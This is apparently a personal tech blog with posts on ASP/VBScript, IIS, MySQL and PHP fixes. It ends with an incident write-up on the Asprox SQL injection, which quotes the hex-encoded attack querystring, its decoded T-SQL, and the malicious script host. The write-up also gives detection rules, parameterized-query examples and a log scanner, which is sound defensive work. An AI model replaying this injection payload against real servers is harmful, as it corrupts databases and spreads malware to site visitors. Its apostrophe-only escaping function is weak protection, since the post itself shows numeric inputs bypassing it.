
Looking to hire for mysql / iis asp troubleshooting

Hello,

I'm looking to hire someone to fix these errors on our servers:
090315 13:47:27 [Warning] Aborted connection 10269 to db: user: 'abc' host: 'server.de' (Got an error reading communication packets)

At the same time, the asp scripts on IIS6 give a connection error when trying to connect to the mysql server.

The error appears when going from a Windows 2003 IIS6 server using MySQL Connector/ODBC 5.1.5 to connect to a MySQL box running Gentoo Linux mysql-5.0.44-r2.

The errors appear sporadically and I'm looking for someone who has the skills on both Linux and Windows platforms to trace the error and help solve it.

Any takers?
Please respond.

Posted in misc.



vbscript to convert html into numeric entities for xml file (rss feed)

After numerous failures getting past http://feedvalidator.org because of some remnants left by Word or other text editors, I implemented the replacement function found at http://www.texaswebdevelopers.com/examples/sql-injection-protection.asp.

For the German text we work on it was changed slightly to include German umlauts.
Here's the function:

FUNCTION htmlEntities(strString)
    Dim strOutput, objAmp
    strOutput = strString

    ' drop raw line breaks
    strOutput = Replace(strOutput, Chr(10), "")
    strOutput = Replace(strOutput, Chr(13), "")

    ' Encode bare ampersands first, but leave entities that are already there
    ' (&amp; &#38; &#x26; ...) alone; a plain Replace of "&" would turn them into
    ' &#38;amp; and the named-entity replacements further down would never match.
    Set objAmp = New RegExp
    objAmp.Global = True
    objAmp.Pattern = "&(?!(#[0-9]+|#x[0-9A-Fa-f]+|[A-Za-z][A-Za-z0-9]*);)"
    strOutput = objAmp.Replace(strOutput, "&#38;")
    Set objAmp = Nothing

    ' characters that are special in XML
    strOutput = Replace(strOutput, "'", "&#39;")
    strOutput = Replace(strOutput, Chr(34), "&#34;")
    strOutput = Replace(strOutput, "<", "&#60;")
    strOutput = Replace(strOutput, ">", "&#62;")

    ' typographic characters left behind by Word and friends. The literal
    ' characters below require the .asp file to be saved in the codepage the
    ' page runs in (e.g. Windows-1252); ChrW(8211) etc. would avoid that.
    strOutput = Replace(strOutput, "–", "&#8211;")
    strOutput = Replace(strOutput, "—", "&#8212;")
    strOutput = Replace(strOutput, "‘", "&#8216;")
    strOutput = Replace(strOutput, "’", "&#8217;")
    strOutput = Replace(strOutput, "“", "&#8220;")
    strOutput = Replace(strOutput, "”", "&#8221;")
    strOutput = Replace(strOutput, "„", "&#8222;")
    strOutput = Replace(strOutput, "†", "&#8224;")
    strOutput = Replace(strOutput, "‡", "&#8225;")
    strOutput = Replace(strOutput, "…", "&#8230;")
    strOutput = Replace(strOutput, "¡", "&#161;")
    strOutput = Replace(strOutput, "¤", "&#164;")
    strOutput = Replace(strOutput, "¢", "&#162;")
    strOutput = Replace(strOutput, "£", "&#163;")
    strOutput = Replace(strOutput, "¥", "&#165;")
    strOutput = Replace(strOutput, "¦", "&#166;")
    strOutput = Replace(strOutput, "§", "&#167;")
    strOutput = Replace(strOutput, "¨", "&#168;")
    strOutput = Replace(strOutput, "©", "&#169;")
    strOutput = Replace(strOutput, "ª", "&#170;")
    strOutput = Replace(strOutput, "«", "&#171;")
    strOutput = Replace(strOutput, "¬", "&#172;")
    strOutput = Replace(strOutput, "®", "&#174;")
    strOutput = Replace(strOutput, "™", "&#8482;")
    strOutput = Replace(strOutput, "¯", "&#175;")
    strOutput = Replace(strOutput, "°", "&#176;")
    strOutput = Replace(strOutput, "±", "&#177;")
    strOutput = Replace(strOutput, "²", "&#178;")
    strOutput = Replace(strOutput, "³", "&#179;")
    strOutput = Replace(strOutput, "´", "&#180;")
    strOutput = Replace(strOutput, "µ", "&#181;")
    strOutput = Replace(strOutput, "¶", "&#182;")
    strOutput = Replace(strOutput, "·", "&#183;")
    strOutput = Replace(strOutput, "¸", "&#184;")
    strOutput = Replace(strOutput, "¹", "&#185;")
    strOutput = Replace(strOutput, "º", "&#186;")
    strOutput = Replace(strOutput, "»", "&#187;")
    strOutput = Replace(strOutput, "¼", "&#188;")
    strOutput = Replace(strOutput, "½", "&#189;")
    strOutput = Replace(strOutput, "¾", "&#190;")
    strOutput = Replace(strOutput, "¿", "&#191;")
    strOutput = Replace(strOutput, "×", "&#215;")
    strOutput = Replace(strOutput, "÷", "&#247;")
    strOutput = Replace(strOutput, "‰", "&#8240;")
    strOutput = Replace(strOutput, "‹", "&#8249;")
    strOutput = Replace(strOutput, "›", "&#8250;")
    strOutput = Replace(strOutput, "€", "&#8364;")

    ' HTML named entities to numeric references: XML without the HTML DTD only
    ' knows &lt; &gt; &amp; &apos; &quot;, so every other name breaks the feed.
    strOutput = Replace(strOutput, "&quot;", "&#34;")
    strOutput = Replace(strOutput, "&apos;", "&#39;")
    strOutput = Replace(strOutput, "&amp;", "&#38;")
    strOutput = Replace(strOutput, "&lt;", "&#60;")
    strOutput = Replace(strOutput, "&gt;", "&#62;")
    strOutput = Replace(strOutput, "&nbsp;", "&#160;")
    strOutput = Replace(strOutput, "&ndash;", "&#8211;")
    strOutput = Replace(strOutput, "&mdash;", "&#8212;")
    strOutput = Replace(strOutput, "&lsquo;", "&#8216;")
    strOutput = Replace(strOutput, "&rsquo;", "&#8217;")
    strOutput = Replace(strOutput, "&sbquo;", "&#8218;")
    strOutput = Replace(strOutput, "&ldquo;", "&#8220;")
    strOutput = Replace(strOutput, "&rdquo;", "&#8221;")
    strOutput = Replace(strOutput, "&bdquo;", "&#8222;")
    strOutput = Replace(strOutput, "&dagger;", "&#8224;")
    strOutput = Replace(strOutput, "&Dagger;", "&#8225;")
    strOutput = Replace(strOutput, "&hellip;", "&#8230;")
    strOutput = Replace(strOutput, "&iexcl;", "&#161;")
    strOutput = Replace(strOutput, "&curren;", "&#164;")
    strOutput = Replace(strOutput, "&cent;", "&#162;")
    strOutput = Replace(strOutput, "&pound;", "&#163;")
    strOutput = Replace(strOutput, "&yen;", "&#165;")
    strOutput = Replace(strOutput, "&brvbar;", "&#166;")
    strOutput = Replace(strOutput, "&sect;", "&#167;")
    strOutput = Replace(strOutput, "&uml;", "&#168;")
    strOutput = Replace(strOutput, "&copy;", "&#169;")
    strOutput = Replace(strOutput, "&ordf;", "&#170;")
    strOutput = Replace(strOutput, "&laquo;", "&#171;")
    strOutput = Replace(strOutput, "&not;", "&#172;")
    strOutput = Replace(strOutput, "&shy;", "&#173;")
    strOutput = Replace(strOutput, "&reg;", "&#174;")
    strOutput = Replace(strOutput, "&trade;", "&#8482;")
    strOutput = Replace(strOutput, "&macr;", "&#175;")
    strOutput = Replace(strOutput, "&deg;", "&#176;")
    strOutput = Replace(strOutput, "&plusmn;", "&#177;")
    strOutput = Replace(strOutput, "&sup2;", "&#178;")
    strOutput = Replace(strOutput, "&sup3;", "&#179;")
    strOutput = Replace(strOutput, "&acute;", "&#180;")
    strOutput = Replace(strOutput, "&micro;", "&#181;")
    strOutput = Replace(strOutput, "&para;", "&#182;")
    strOutput = Replace(strOutput, "&middot;", "&#183;")
    strOutput = Replace(strOutput, "&cedil;", "&#184;")
    strOutput = Replace(strOutput, "&sup1;", "&#185;")
    strOutput = Replace(strOutput, "&ordm;", "&#186;")
    strOutput = Replace(strOutput, "&raquo;", "&#187;")
    strOutput = Replace(strOutput, "&frac14;", "&#188;")
    strOutput = Replace(strOutput, "&frac12;", "&#189;")
    strOutput = Replace(strOutput, "&frac34;", "&#190;")
    strOutput = Replace(strOutput, "&iquest;", "&#191;")
    strOutput = Replace(strOutput, "&times;", "&#215;")
    strOutput = Replace(strOutput, "&divide;", "&#247;")
    strOutput = Replace(strOutput, "&Agrave;", "&#192;")
    strOutput = Replace(strOutput, "&Aacute;", "&#193;")
    strOutput = Replace(strOutput, "&Acirc;", "&#194;")
    strOutput = Replace(strOutput, "&Atilde;", "&#195;")
    strOutput = Replace(strOutput, "&Auml;", "&#196;")
    strOutput = Replace(strOutput, "&Aring;", "&#197;")
    strOutput = Replace(strOutput, "&AElig;", "&#198;")
    strOutput = Replace(strOutput, "&Ccedil;", "&#199;")
    strOutput = Replace(strOutput, "&Egrave;", "&#200;")
    strOutput = Replace(strOutput, "&Eacute;", "&#201;")
    strOutput = Replace(strOutput, "&Ecirc;", "&#202;")
    strOutput = Replace(strOutput, "&Euml;", "&#203;")
    strOutput = Replace(strOutput, "&Igrave;", "&#204;")
    strOutput = Replace(strOutput, "&Iacute;", "&#205;")
    strOutput = Replace(strOutput, "&Icirc;", "&#206;")
    strOutput = Replace(strOutput, "&Iuml;", "&#207;")
    strOutput = Replace(strOutput, "&ETH;", "&#208;")
    strOutput = Replace(strOutput, "&Ntilde;", "&#209;")
    strOutput = Replace(strOutput, "&Ograve;", "&#210;")
    strOutput = Replace(strOutput, "&Oacute;", "&#211;")
    strOutput = Replace(strOutput, "&Ocirc;", "&#212;")
    strOutput = Replace(strOutput, "&Otilde;", "&#213;")
    strOutput = Replace(strOutput, "&Ouml;", "&#214;")
    strOutput = Replace(strOutput, "&Oslash;", "&#216;")
    strOutput = Replace(strOutput, "&Ugrave;", "&#217;")
    strOutput = Replace(strOutput, "&Uacute;", "&#218;")
    strOutput = Replace(strOutput, "&Ucirc;", "&#219;")
    strOutput = Replace(strOutput, "&Uuml;", "&#220;")
    strOutput = Replace(strOutput, "&Yacute;", "&#221;")
    strOutput = Replace(strOutput, "&THORN;", "&#222;")
    strOutput = Replace(strOutput, "&szlig;", "&#223;")
    strOutput = Replace(strOutput, "&agrave;", "&#224;")
    strOutput = Replace(strOutput, "&aacute;", "&#225;")
    strOutput = Replace(strOutput, "&acirc;", "&#226;")
    strOutput = Replace(strOutput, "&atilde;", "&#227;")
    strOutput = Replace(strOutput, "&auml;", "&#228;")
    strOutput = Replace(strOutput, "&aring;", "&#229;")
    strOutput = Replace(strOutput, "&aelig;", "&#230;")
    strOutput = Replace(strOutput, "&ccedil;", "&#231;")
    strOutput = Replace(strOutput, "&egrave;", "&#232;")
    strOutput = Replace(strOutput, "&eacute;", "&#233;")
    strOutput = Replace(strOutput, "&ecirc;", "&#234;")
    strOutput = Replace(strOutput, "&euml;", "&#235;")
    strOutput = Replace(strOutput, "&igrave;", "&#236;")
    strOutput = Replace(strOutput, "&iacute;", "&#237;")
    strOutput = Replace(strOutput, "&icirc;", "&#238;")
    strOutput = Replace(strOutput, "&iuml;", "&#239;")
    strOutput = Replace(strOutput, "&eth;", "&#240;")
    strOutput = Replace(strOutput, "&ntilde;", "&#241;")
    strOutput = Replace(strOutput, "&ograve;", "&#242;")
    strOutput = Replace(strOutput, "&oacute;", "&#243;")
    strOutput = Replace(strOutput, "&ocirc;", "&#244;")
    strOutput = Replace(strOutput, "&otilde;", "&#245;")
    strOutput = Replace(strOutput, "&ouml;", "&#246;")
    strOutput = Replace(strOutput, "&oslash;", "&#248;")
    strOutput = Replace(strOutput, "&ugrave;", "&#249;")
    strOutput = Replace(strOutput, "&uacute;", "&#250;")
    strOutput = Replace(strOutput, "&ucirc;", "&#251;")
    strOutput = Replace(strOutput, "&uuml;", "&#252;")
    strOutput = Replace(strOutput, "&yacute;", "&#253;")
    strOutput = Replace(strOutput, "&thorn;", "&#254;")
    strOutput = Replace(strOutput, "&yuml;", "&#255;")
    strOutput = Replace(strOutput, "&OElig;", "&#338;")
    strOutput = Replace(strOutput, "&oelig;", "&#339;")
    strOutput = Replace(strOutput, "&Scaron;", "&#352;")
    strOutput = Replace(strOutput, "&scaron;", "&#353;")
    strOutput = Replace(strOutput, "&Yuml;", "&#376;")
    strOutput = Replace(strOutput, "&circ;", "&#710;")
    strOutput = Replace(strOutput, "&tilde;", "&#732;")
    strOutput = Replace(strOutput, "&ensp;", "&#8194;")
    strOutput = Replace(strOutput, "&emsp;", "&#8195;")
    strOutput = Replace(strOutput, "&thinsp;", "&#8201;")
    strOutput = Replace(strOutput, "&zwnj;", "&#8204;")
    strOutput = Replace(strOutput, "&zwj;", "&#8205;")
    strOutput = Replace(strOutput, "&lrm;", "&#8206;")
    strOutput = Replace(strOutput, "&rlm;", "&#8207;")
    strOutput = Replace(strOutput, "&permil;", "&#8240;")
    strOutput = Replace(strOutput, "&lsaquo;", "&#8249;")
    strOutput = Replace(strOutput, "&rsaquo;", "&#8250;")
    strOutput = Replace(strOutput, "&euro;", "&#8364;")

    ' German umlauts and sharp s typed as raw characters
    strOutput = Replace(strOutput, "ä", "&#228;")
    strOutput = Replace(strOutput, "Ä", "&#196;")
    strOutput = Replace(strOutput, "ö", "&#246;")
    strOutput = Replace(strOutput, "Ö", "&#214;")
    strOutput = Replace(strOutput, "ü", "&#252;")
    strOutput = Replace(strOutput, "Ü", "&#220;")
    strOutput = Replace(strOutput, "ß", "&#223;")

    htmlEntities = strOutput
END FUNCTION

Posted in misc.


Apostrophe in eval() on asp vbscript

Eval() stops executing when it hits an apostrophe in the evaluated expression.
I had to find this out the hard way after some messages were truncated by this bug.
Some further explanation:
http://bytes.com/topic/javascript/answers/712903-eval-apostrophe

I used this opportunity to replace all the eval calls in that particular function with the actual variable names.
Don’t be eval!

Posted in misc.


ipayment addresscheck

Today we had some trouble with the automatic address check provided by our payment provider ipayment.

For some reason, German street names were no longer accepted if they contained special German characters such as ß or ö, ä, ü. We countered by replacing them with their "manual" counterparts ss, oe, ae, ue.

The problem seems to have disappeared a few hours later but my email to ipayment has been unanswered so far.

Posted in code.



new canonical tag by google, yahoo, etc..

After reading up on the new canonical tag by google I immediately looked at implementing it on our home-grown cms. It turns out that we’re already 301ing where we can, and the canonical tag would have little relevance at first glance. 

http://www.mattcutts.com/blog/canonical-link-tag/

However, we use our own session management and sometimes a url like verynice.html gets turned into notsonice.asp?id=verynice when certain session functions kick in.

A quick hack into our header and now we use the canonical tag in order to tell google and yahoo about our content. As I’ve seen thousands of duplicate content issues in google webmaster tools, I hope this will have some effect.

Posted in code.



strip html tags in vbscript

Function stripHTMLtags(HTMLstring)
    Dim RegularExpressionObject

    Set RegularExpressionObject = New RegExp
    With RegularExpressionObject
        ' anything from "<" up to the next ">" is treated as a tag and removed
        .Pattern = "<[^>]+>"
        .IgnoreCase = True
        .Global = True
    End With

    ' Note: this is display clean-up, not an output encoder; text written back
    ' into a page still needs Server.HTMLEncode.
    stripHTMLtags = RegularExpressionObject.Replace(HTMLstring, "")
    Set RegularExpressionObject = Nothing
End Function

Posted in code.



blogspot deleted my blog. Sniff.

And then it was gone. After a healthy breakfast and a cortado I was faced with this when visiting my blog. It had been deleted by the good folks at google. No email, no message saying “Sorry”. Just gone.

It seems I'm not the only one facing such difficulties (as a search for deleted blogspot blogs will show), and it seems that Google sometimes does it to their own blogs (http://www.searchenginejournal.com/google-blog-accidentally-deleted-by-google/3186/).

What really irked me though was that they did not even send an email to the owner of the blog. Is this the right way to treat bloggers? Even more frustrating is the attempt to contact Google for help. Their "help" pages on blogspot are a hellish circle of multiple-choice questions that led me to read the postings of other helpless users on the blogspot help group.

The only choice I had was to host this blog myself. So here we go, a new site, a new url. Thanks google.

Posted in misc.



consuming a .net web service with php problem

The trouble I had consuming a .NET web service from a PHP script was that the parameters I passed were not "seen" by the .NET application.
I used php_soap.dll (PHP 5 running on Windows) with the simple call:

$testRequest = $client->IsAliveNachnameEmail("Smith", "smith@smith.com");

However, the .NET SOAP service did not receive the parameters Smith and smith@smith.com.

Do not pass in the parameters directly, but use the following method:

$strNachname = "smith";
$strEmail = "smith@smith.com";
// one associative array whose keys match the parameter names in the WSDL
$params = array('Nachname' => $strNachname, 'Email' => $strEmail);
$testRequest = $client->IsAliveNachnameEmail($params);
echo $testRequest->IsAliveNachnameEmailResult;

and it works! Voila.

Posted in code.



iis using cifs share (unc) really slow! here’s the solution.

I just spent the whole weekend waging war with my IIS box (Windows 2003 Server). After moving the files from a local drive to a NetApp share (CIFS), the speed of my site slowed to a crawl.
The pages would still appear – but the pace was incredibly slow.
What’s more, the ISAPI REWRITE extension was no longer working, even though the httpd.ini file was in the web root – as it had been before, but for some reason the rewrite extension could not see the file.

So, I hoped that my usual strategy would yield the solution to the problem. The right combination of keywords usually finds a forum entry with the same problem and a corresponding solution. This time however, no such luck. A good hint did come from the helicon tech forum (the makers of ISAPI rewrite).

The solution was to change the application pool identity (user).
The Network Service user – the default for an application pool – did not have proper access to the share (although it did have some access – probably after x timeouts). A new user (created specifically for the CIFS share) solved the problem and IIS is humming again. I had to add some group memberships to this user to make it work.
Hope this helps someone in the same situation.
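The change described above, scripted: an added example (not from the post) that switches an IIS 6 application pool from NETWORK SERVICE to a dedicated, least-privilege account through the IIS 6 ADSI provider. The pool and account names are hypothetical and come from the command line; the password is read from stdin so it does not land in the process command line or shell history. Run it with cscript as an administrator.

```vbscript
' Added example, not from the post: set an IIS 6 application pool identity to
' a specific (least-privilege) account instead of NETWORK SERVICE.
' Assumes the IIS 6 metabase ADSI provider at IIS://localhost/W3SVC.
Option Explicit

Dim strPoolName, strUser, strPass, objPool

If WScript.Arguments.Count <> 2 Then
    WScript.Echo "usage: cscript setpoolidentity.vbs <AppPoolName> <DOMAIN\user>"
    WScript.Quit 1
End If
strPoolName = WScript.Arguments(0)   ' hypothetical pool name, e.g. MyAppPool
strUser = WScript.Arguments(1)       ' hypothetical account, e.g. DOMAIN\svc_webshare

' read the password interactively rather than taking it as an argument
WScript.StdOut.Write "Password for " & strUser & ": "
strPass = WScript.StdIn.ReadLine

' IIsApplicationPool metabase properties:
'   AppPoolIdentityType: 0 = LocalSystem, 1 = LocalService, 2 = NetworkService, 3 = specific user
'   WAMUserName / WAMUserPass: the account used when the type is 3
Set objPool = GetObject("IIS://localhost/W3SVC/AppPools/" & strPoolName)
objPool.AppPoolIdentityType = 3
objPool.WAMUserName = strUser
objPool.WAMUserPass = strPass
objPool.SetInfo

WScript.Echo "Application pool " & strPoolName & " now runs as " & strUser
```

Two things the script does not do for you: on IIS 6 the account must be a member of the server's local IIS_WPG group or the worker process will not start (this is the group membership the post alludes to), and on the share it should get only the permissions the site actually uses (read on the web root, write only where uploads or logs go). Recycle the pool afterwards so the new identity takes effect.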

Posted in code.



Fast-flux botnet! Asprox! SQL Injection! oh no!

No, it’s not from “back to the future”. But it might make you rip your hair out and you’ll end up looking like the Doc.

Here’s an introduction of what they are: http://blogs.zdnet.com/security/?p=1122
and some evidence of people scrambling on how to protect their servers: http://www.experts-exchange.com/Security/Vulnerabilities/Q_23408074.html

This morning I got a frantic call from head office telling me that we've been hacked and that the database is filled with JavaScript strings pointing to www.banner82.com/b.js. Both banner82.com and banner82.org are referenced in the scripts.

Here's the querystring that was (and still is) being tried against all variables of our application:

DECLARE%20@S%20 VARCHAR(4000);SET%20@S=CAST(0x
655F437572736F7220494E544F2040542C404320454E 4420434C4F5345205461626C655F437572736F722044 45414C4C4F43415445205461626C655F437572736F722

0%20AS%20VARCHAR(4000));EXEC(@S);--

which translates to the following sql statements:

DECLARE
@T VARCHAR(255),
@C VARCHAR(255)
DECLARE
Table_Cursor
CURSOR FOR
SELECT
a.name,b.name
FROM
sysobjects a,syscolumns b
WHERE
a.id=b.id AND
a.xtype='u' AND
(b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN
Table_Cursor
FETCH NEXT FROM
Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''''')
FETCH NEXT FROM Table_Cursor
INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
(courtesy of http://pastebin.com/d73dda647)

So we got hit. Here’s what we did and what you can do to protect your servers.

Step 1. Take down the site.
Step 2. Clean the database
Step 3. Patch the .asp pages to look for possible injection attacks.
Step 4. Bring the site back up and monitor it.

Here are some tips:
1. Taking down the site is quickly done in IIS, but it's worthwhile to redirect to a page that tells users that you'll be back up shortly.
2. To clean the database I used 2 stored procedures. The reason that there are 2 is that SQL Server 2000 needs some extra tweaking when it comes to ntext fields.
2a. The first stored procedure was taken from this site: http://vyaskn.tripod.com/sql_server_search_and_replace.htm.
I had to customize the stored procedure a bit, but Vyas has written a great stored procedure that gets us halfway there.
2b. Now we just have ntext fields left that contain the JavaScript tags. Ntext fields are more difficult to work with, as you can't use the Replace function. Instead, we use UPDATETEXT.
To do this, I customized the stored procedure found on http://sqlserver2000.databases.aspfaq.com/how-do-i-handle-replace-within-an-ntext-column-in-sql-server.html at aspfaq.com.
This stored procedure will replace one string with another in ntext fields. Even though this wasn't strictly necessary (as you can see above, the ntext fields were cut down to 4000 characters in the attack), I decided to find out how to replace strings in ntext fields.
3. Patching the pages: To do so, you can either parameterize all your query variables into stored procedures (or cmd objects), or you can write your own asp function to strip all inputs before they are sent to the database in dynamic queries.
We chose to go the route of writing our own asp function.

You can use something as simple as:

FUNCTION ChkString(strValue)
    IF strValue = "" THEN
        strValue = " "
    END IF
    ' only doubles apostrophes so they cannot close a string literal in dynamic SQL
    ChkString = Replace(strValue, "'", "''")
END FUNCTION

which will only make sure that all apostrophes are escaped. To make a more advanced function, you can add the Server.HTMLEncode function, and any regular expressions or replacing functions to filter out any offending characters. Just search for XSS vulnerability to get more information on this.

Of importance here is to make sure that all numeric values that go to the database are first wrapped in the CLng conversion function. This will throw an error whenever an input contains a non-numeric string instead of the number you're expecting. You can use this error to monitor how attacks on your site are made by specifying a custom ASP error page in IIS.
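To put steps 3 and the CLng advice side by side: an added example (not from the post) showing the dynamic-SQL pattern the injection above needs, next to the parameterized ADODB.Command form the post calls "cmd objects", with CLng guarding the numeric input. The connection string CONN_STR and the Products table (ProductId int, Name nvarchar(255)) are hypothetical.

```vbscript
' Added example, not from the post. Assumptions: CONN_STR and the Products table
' (ProductId int, Name nvarchar(255)) are hypothetical.
Option Explicit

Const CONN_STR = "Provider=SQLOLEDB;Data Source=dbserver;Initial Catalog=shop;Integrated Security=SSPI;"
' ADO constants normally taken from adovbs.inc
Const adInteger = 3, adVarWChar = 202, adParamInput = 1, adCmdText = 1

' VULNERABLE: the request value is concatenated into the statement. With
' id = "42;DECLARE @S VARCHAR(4000)..." the injected batch runs as well, and
' ChkString does not help: no apostrophe is needed in a numeric context.
Function ProductNameUnsafe(strId)
    Dim objConn, objRs
    Set objConn = CreateObject("ADODB.Connection")
    objConn.Open CONN_STR
    Set objRs = objConn.Execute("SELECT Name FROM Products WHERE ProductId = " & strId)
    If Not objRs.EOF Then ProductNameUnsafe = objRs("Name") Else ProductNameUnsafe = ""
    objRs.Close: objConn.Close
End Function

' HARDENED: CLng rejects anything that is not a whole number (VBScript error 13,
' type mismatch, which asperror.asp can report), and both values travel as typed
' parameters rather than as part of the SQL text.
Function ProductName(strId, strNamePrefix)
    Dim objConn, objCmd, objRs, lngId
    lngId = CLng(strId)   ' raises error 13 on "42;DECLARE ..." before any SQL runs

    Set objConn = CreateObject("ADODB.Connection")
    objConn.Open CONN_STR

    Set objCmd = CreateObject("ADODB.Command")
    Set objCmd.ActiveConnection = objConn
    objCmd.CommandType = adCmdText
    objCmd.CommandText = "SELECT Name FROM Products WHERE ProductId = ? AND Name LIKE ?"
    objCmd.Parameters.Append objCmd.CreateParameter("id", adInteger, adParamInput, , lngId)
    ' LIKE wildcards (% and _) inside the value are still interpreted by SQL Server;
    ' escape them if user input must be matched literally
    objCmd.Parameters.Append objCmd.CreateParameter("name", adVarWChar, adParamInput, 255, strNamePrefix & "%")

    Set objRs = objCmd.Execute
    If Not objRs.EOF Then ProductName = objRs("Name") Else ProductName = ""
    objRs.Close: objConn.Close
End Function

' Usage inside a page (output is encoded so stored script does not render either):
'   Response.Write Server.HTMLEncode(ProductName(Request.QueryString("id"), Request.QueryString("q")))
```

With the parameterized version the database driver sends the values separately from the statement, so the payload above can no longer change the statement's shape; the CLng call in front of it is what turns a probe into the logged error the post uses for monitoring.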

The custom error page can be called asperror.asp and contain the following:

Sub geterror
    Dim objasperror, code, num, src, cat, file, line, column, desc, adesc
    ' gather details about the error from the ASPError object
    ' get the last error that occurred!
    Set objasperror = Server.GetLastError
    ' go through the properties and get whatever you need...
    With objasperror
        code = .ASPCode
        num = .Number
        src = .Source
        cat = .Category
        file = .File
        line = .Line
        column = .Column
        desc = .Description
        adesc = .ASPDescription
    End With

    ' free ASPError object
    Set objasperror = Nothing

    ' sendmail: Sendmail is the site's own helper (from, to, subject, body); it is not shown here
    Sendmail "info@mail.com", "info@mail.com", "asperror", _
        "Code: " & code & vbCrLf & "Num: " & num & vbCrLf & "src: " & src & vbCrLf & _
        "cat: " & cat & vbCrLf & "File: " & file & vbCrLf & "line: " & line & vbCrLf & _
        "Column: " & column & vbCrLf & "Desc: " & desc & vbCrLf & "ASPDesc: " & adesc & vbCrLf & _
        "QueryString: " & Request.QueryString & vbCrLf & "Form: " & Request.Form & vbCrLf & _
        "Referer: " & Request.ServerVariables("HTTP_REFERER") & " " & Request.ServerVariables("REMOTE_ADDR")
End Sub

This kind of function will keep you up to date on how, and by whom, your server is being attacked.

4. Last but not least: avoid this kind of attack altogether. With an ISAPI component like ISAPI_Rewrite by Helicon, you state something like:
RewriteRule .*DECLARE\s.* http://www.mysite.com/block.asp [I,R]
which will make sure that all these attempts are redirected.
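A rewrite rule keyed on one spelling of DECLARE only catches requests written that way, so it pays to also read what reached the IIS logs. The following added example (not from the post) decodes the hex-encoded CAST(0x...) payload shown above from W3C log lines, the same decoding SQL Server performs when it runs CAST(0x.. AS VARCHAR), and counts the hits. The two log lines are constructed for the example; the hex in the second encodes only the first line of the decoded statement above, DECLARE @T VARCHAR(255).

```vbscript
' Added example, not from the post: find and decode CAST(0x...) payloads in IIS
' W3C log lines. Sample lines below are constructed, not real traffic.
Option Explicit

' Turn "4445434C..." into text, as CAST(0x... AS VARCHAR) does on the server.
Function HexToText(strHex)
    Dim i, strOut
    strOut = ""
    For i = 1 To Len(strHex) - 1 Step 2
        strOut = strOut & Chr(CLng("&H" & Mid(strHex, i, 2)))
    Next
    HexToText = strOut
End Function

' Return the decoded statement if the line carries a CAST(0x..) payload, else "".
Function ExtractSqlPayload(strLine)
    Dim objRe, objMatches
    Set objRe = New RegExp
    objRe.IgnoreCase = True
    objRe.Global = False
    ' matches the raw form (CAST(0x.. AS VARCHAR) as well as the URL-encoded one
    ' (CAST(0x..%20AS%20VARCHAR); N? also covers NVARCHAR payloads
    objRe.Pattern = "CAST\(0x([0-9A-F]+)(%20|\+|\s)+AS(%20|\+|\s)+N?VARCHAR"
    ExtractSqlPayload = ""
    Set objMatches = objRe.Execute(strLine)
    If objMatches.Count > 0 Then
        ExtractSqlPayload = HexToText(objMatches(0).SubMatches(0))
    End If
End Function

' Scan an array of log lines; print each decoded payload and return the hit count.
Function ScanLogLines(arrLines)
    Dim strLine, strSql, lngHits
    lngHits = 0
    For Each strLine In arrLines
        strSql = ExtractSqlPayload(strLine)
        If strSql <> "" Then
            lngHits = lngHits + 1
            WScript.Echo "injection attempt: " & Left(strLine, 60) & "..."
            WScript.Echo "  decoded: " & strSql
        End If
    Next
    ScanLogLines = lngHits
End Function

' Constructed sample in W3C extended format (date time s-ip cs-method cs-uri-stem
' cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status): one clean
' request and one carrying the payload shape from the post.
Dim arrSample
arrSample = Array( _
    "2008-05-20 09:12:01 10.0.0.5 GET /product.asp id=42 80 - 198.51.100.7 Mozilla/4.0 200", _
    "2008-05-20 09:12:03 10.0.0.5 GET /product.asp id=42;DECLARE%20@S%20VARCHAR(4000);SET%20@S=" & _
    "CAST(0x4445434C41524520405420564152434841522832353529%20AS%20VARCHAR(4000));EXEC(@S);-- " & _
    "80 - 198.51.100.7 Mozilla/4.0 200")

' prints one decoded payload ("DECLARE @T VARCHAR(255)") and "1 suspicious line(s)"
WScript.Echo ScanLogLines(arrSample) & " suspicious line(s)"
```

Run it with cscript; to scan a real log, read the file with Scripting.FileSystemObject's OpenTextFile and feed the lines to ScanLogLines. A decoded payload in the log tells you whether a request got past the rewrite rule and, from the statement text, what it tried to do, which is the information to check against the database after the clean-up in step 2.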

Posted in security.
